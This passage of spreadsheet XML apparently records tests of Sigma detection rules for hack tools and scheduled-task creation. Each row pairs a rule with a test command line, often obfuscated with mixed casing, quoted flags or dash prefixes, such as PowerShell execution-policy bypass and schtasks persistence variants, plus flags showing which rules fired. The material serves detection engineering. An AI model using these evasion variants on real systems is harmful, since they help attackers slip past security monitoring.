      </c>
      <c r="C62" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D62" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E62" s="44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2" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G62" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H62" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I62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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K62" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="63" ht="15.75" customHeight="1" s="42">
      <c r="A63" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B63" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C63" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D63" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E63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3" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G63" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H63" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I63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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K63" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="64" ht="15.75" customHeight="1" s="42">
      <c r="A64" s="43" t="n"/>
      <c r="B64" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C64" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D64" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E64" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F64" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H64" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I64" s="43" t="n"/>
      <c r="J64" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K64" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="65" ht="15.75" customHeight="1" s="42">
      <c r="A65" s="43" t="n"/>
      <c r="B65" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C65" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D65" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E65" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H65" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I65" s="43" t="n"/>
      <c r="J65" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K65" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="66" ht="15.75" customHeight="1" s="42">
      <c r="A66" s="43" t="n"/>
      <c r="B66" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C66" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D66" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E66" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G66" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H66" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I66" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J66" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K66" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="67" ht="15.75" customHeight="1" s="42">
      <c r="A67" s="43" t="n"/>
      <c r="B67" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C67" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D67" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E67" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G67" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H67" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I67" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J67" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K67" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="68" ht="15.75" customHeight="1" s="42">
      <c r="A68" s="43" t="n"/>
      <c r="B68" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C68" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D68" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E68" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G68" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H68" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I68" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J68" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K68" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="69" ht="15.75" customHeight="1" s="42">
      <c r="A69" s="43" t="n"/>
      <c r="B69" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C69" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D69" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E69" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G69" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H69" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I69" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J69" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K69" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="70" ht="15.75" customHeight="1" s="42">
      <c r="A70" s="43" t="n"/>
      <c r="B70" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C70" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D70" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E70" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F70" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G70" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H70" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I70" s="44" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J70" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K70" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="71" ht="15.75" customHeight="1" s="42">
      <c r="A71" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B71" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C71" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D71" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E71" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /tn "Test" /tr "cmd.exe" /sc once /st 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F71" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G71" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H71" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I71" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J71" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K71" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="72" ht="15.75" customHeight="1" s="42">
      <c r="A72" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B72" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C72" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D72" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E72" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /"tn" "Test" /"tr" "cmd.exe" /sc once /st 12:00 -"ru" "%USERNAME%" /F</t>
        </is>
      </c>
      <c r="F72" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G72" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H72" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I72" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J72" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K72" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="73" ht="15.75" customHeight="1" s="42">
      <c r="A73" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B73" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C73" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D73" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E73" s="44" t="inlineStr">
        <is>
          <t>schtasks /CREATe /tn "Test" /tr "cmd.exe" /sc once /ST 12:00 /ru "%USERNAME%" -"f"</t>
        </is>
      </c>
      <c r="F73" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G73" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H73" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I73" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J73" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K73" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="74" ht="15.75" customHeight="1" s="42">
      <c r="A74" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B74" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C74" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D74" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E74" s="44" t="inlineStr">
        <is>
          <t>schtasks /"create" -"tn" "Test" -"tr" "cmd.exe" /sc once /sT 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G74" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H74" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I74" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J74" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K74" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="75" ht="15.75" customHeight="1" s="42">
      <c r="A75" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B75" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C75" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D75" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E75" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /tN "Test" -"tr" "cmd.exe" /sc once /st 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G75" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H75" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I75" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J75" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K75" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="76" ht="15.75" customHeight="1" s="42">
      <c r="A76" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B76" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C76" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D76" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E76" s="44" t="inlineStr">
        <is>
          <t>schtasks -"create" /tn "Test" /"tr" "cmd.exe" /"sc" once -"st" 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G76" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H76" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I76" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J76" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K76" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="77" ht="15.75" customHeight="1" s="42">
      <c r="A77" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B77" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C77" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D77" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E77" s="44" t="inlineStr">
        <is>
          <t>schtasks -"create" /tn "Test" -"tr" "cmd.exe" /sc once /sT 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G77" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H77" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I77" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98)</t>
        </is>
      </c>
      <c r="J77" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K77" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="78" ht="15.75" customHeight="1" s="42">
      <c r="A78" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B78" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C78" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D78" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E78" s="44" t="inlineStr">
        <is>
          <t>schtasks /cReATe /TN "Test" /tr "cmd.exe" /Sc once /"st" 12:00 /ru "%USERNAME%" /F</t>
        </is>
      </c>
      <c r="F78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G78" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H78" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I78" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J78" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K78" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="79" ht="15.75" customHeight="1" s="42">
      <c r="A79" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B79" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C79" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D79" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E79" s="44" t="inlineStr">
        <is>
          <t>schtasks /creAtE /"tn" "Test" /TR "cmd.exe" /sC once /sT 12:00 /ru "%USERNAME%" -"f"</t>
        </is>
      </c>
      <c r="F79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G79" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H79" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I79" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J79" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K79" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="80" ht="15.75" customHeight="1" s="42">
      <c r="A80" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B80" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C80" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D80" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E80" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /TN "Test" /tr "cmd.exe" -"sc" once /st 12:00 /"ru" "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G80" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H80" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I80" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J80" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K80" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="81" ht="15.75" customHeight="1" s="42">
      <c r="A81" s="44" t="inlineStr">
        <is>
          <t>t1053.002</t>
        </is>
      </c>
      <c r="B81" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_at_interactive_execution</t>
        </is>
      </c>
      <c r="C81" s="44" t="inlineStr">
        <is>
          <t>Interactive AT Job</t>
        </is>
      </c>
      <c r="D81" s="44" t="inlineStr">
        <is>
          <t>60fc936d-2eb0-4543-8a13-911c750a1dfc</t>
        </is>
      </c>
      <c r="E81" s="44" t="inlineStr">
        <is>
          <t>schtasks /create /"tn" "Test" /tr "cmd.exe" /sc once /ST 12:00 /ru "%USERNAME%" /f</t>
        </is>
      </c>
      <c r="F81" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G81" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H81" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I81" s="44" t="inlineStr">
        <is>
          <t>Suspicious Schtasks Schedule Types (24c8392b-aa3c-46b7-a545-43f71657fe98); Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J81" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K81" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="82" ht="15.75" customHeight="1" s="42">
      <c r="A82" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B82" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C82" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D82" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E82" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /ST 08:00</t>
        </is>
      </c>
      <c r="F82" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G82" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H82" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I82" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J82" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K82" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="83" ht="15.75" customHeight="1" s="42">
      <c r="A83" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B83" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C83" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D83" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E83" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /CReatE -"TN" EvilTask /TR "C:\Windows\System32\calc.exe" /sc WEEKLY -"D" MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F83" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G83" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H83" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I83" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J83" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K83" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="84" ht="15.75" customHeight="1" s="42">
      <c r="A84" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B84" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C84" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D84" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E84" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /cReatE /TN EvilTask /TR "C:\Windows\System32\calc.exe" -"SC" WEEKLY /D MON -"ST" 08:00</t>
        </is>
      </c>
      <c r="F84" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G84" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H84" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I84" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J84" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K84" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="85" ht="15.75" customHeight="1" s="42">
      <c r="A85" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B85" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C85" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D85" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E85" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe /Create /TN EvilTask /TR "C:\Windows\System32\calc.exe" /SC WEEKLY /D MON /"ST" 08:00</t>
        </is>
      </c>
      <c r="F85" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G85" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H85" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I85" s="44" t="inlineStr">
        <is>
          <t>Scheduled Task Creation Via Schtasks.EXE (92626ddd-662c-49e3-ac59-f6535f12d189)</t>
        </is>
      </c>
      <c r="J85" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K85" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="86" ht="15.75" customHeight="1" s="42">
      <c r="A86" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B86" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C86" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D86" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
        </is>
      </c>
      <c r="E86" s="44" t="inlineStr">
        <is>
          <t>schtasks.exe -"Create" /TN EvilTask /"TR" "C:\Windows\System32\calc.exe" /sc WEEKLY /d MON /ST 08:00</t>
        </is>
      </c>
      <c r="F86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H86" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I86" s="43" t="n"/>
      <c r="J86" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K86" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="87" ht="15.75" customHeight="1" s="42">
      <c r="A87" s="44" t="inlineStr">
        <is>
          <t>t1053.005</t>
        </is>
      </c>
      <c r="B87" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_powersploit_empire_default_schtasks</t>
        </is>
      </c>
      <c r="C87" s="44" t="inlineStr">
        <is>
          <t>HackTool - Default PowerSploit/Empire Scheduled Task Creation</t>
        </is>
      </c>
      <c r="D87" s="44" t="inlineStr">
        <is>
          <t>56c217c3-2de2-479b-990f-5c109ba8458f</t>
